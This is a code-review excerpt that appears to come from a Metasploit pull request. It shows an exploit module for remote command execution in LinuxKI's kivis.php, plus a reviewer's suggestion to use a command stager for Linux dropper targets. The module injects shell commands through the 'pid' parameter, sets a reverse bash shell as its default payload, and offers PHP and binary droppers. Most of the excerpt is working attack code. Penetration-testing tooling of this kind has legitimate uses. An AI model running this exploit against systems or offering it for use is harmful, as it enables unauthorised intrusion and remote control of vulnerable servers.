modules/exploits/linux/http/linuxki_rce.rb

```diff
@@ -0,0 +1,153 @@
+          'Targets' =>
+              [
+                [
+                  'Automatic (PHP In-Memory)',
+                  'Platform' => 'php',
+                  'Arch' => ARCH_PHP,
+                  'Type' => :php_memory,
+                  'Payload' => { 'BadChars' => "'" }
+                ],
+                [
+                  'Automatic (PHP Dropper)',
+                  'Platform' => 'php',
+                  'Arch' => ARCH_PHP,
+                  'Type' => :php_dropper
+                ],
+                [
+                  'Automatic (Unix In-Memory)',
+                  'Platform' => 'unix',
+                  'Arch' => ARCH_CMD,
+                  'Type' => :unix_memory,
+                  'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+                ],
+                [
+                  'Automatic (Linux Dropper)',
+                  'Platform' => 'linux',
+                  'Arch' => [ARCH_X86, ARCH_X64],
+                  'Type' => :linux_dropper
+                ]
+              ],
+          'DisclosureDate' => 'May 17 2020',
+          'DefaultTarget' => 0
+        )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The path to the web application', '/']),
+    ])
+    register_advanced_options([
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])
+    ])
+  end
+
+  def check
+    findstr = rand_str
+    res = execute_command("echo '#{findstr}'")
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if (res.code == 404) || (res.code == 403)
+    if (res.code == 200) && res.body.include?(findstr)
+      return CheckCode::Vulnerable
+    end
+
+    CheckCode::Safe
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'linuxki/experimental/vis/', 'kivis.php'),
+      'vars_get' => {
+        'type' => 'kitrace',
+        'pid' => "1;#{cmd};"
+      }
+    })
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+  end
+
+  def exploit
+    unless datastore['ForceExploit']
+      if check == CheckCode::Safe
+        fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+      end
+    end
+
+    print_status("Executing #{target.name} target")
+
+    print_status('Sending payload...')
+
+    case target['Type']
+    when :php_memory
+      execute_command("php -r '#{payload.encoded}'")
+    when :unix_memory
+      execute_command(payload.encoded)
+    when :php_dropper, :linux_dropper
+      dropper
```

Comment:
With `:linux_dropper`, the `#dropper` helper method will drop a PHP file, which will then drop a binary file. Since this exploit is able to directly execute an arbitrary command, it could also be interesting to keep `cmdstager` for `:linux_dropper` targets and avoid using PHP to execute a binary payload. This could be useful in certain situations. You can still keep the first option by adding a new target of type `:php_dropper` for Linux platform and ARCH_X* architectures. For example:
```ruby
                [
                  'Automatic (PHP Dropper for Linux binary)',
                  'Platform' => 'linux',
                  'Arch' => [ARCH_X86, ARCH_X64],
                  'Type' => :php_dropper
                ],
```
and this:
```suggestion
    when :linux_dropper
      execute_cmdstager(linemax: 1_500)
    when :php_dropper
      dropper
```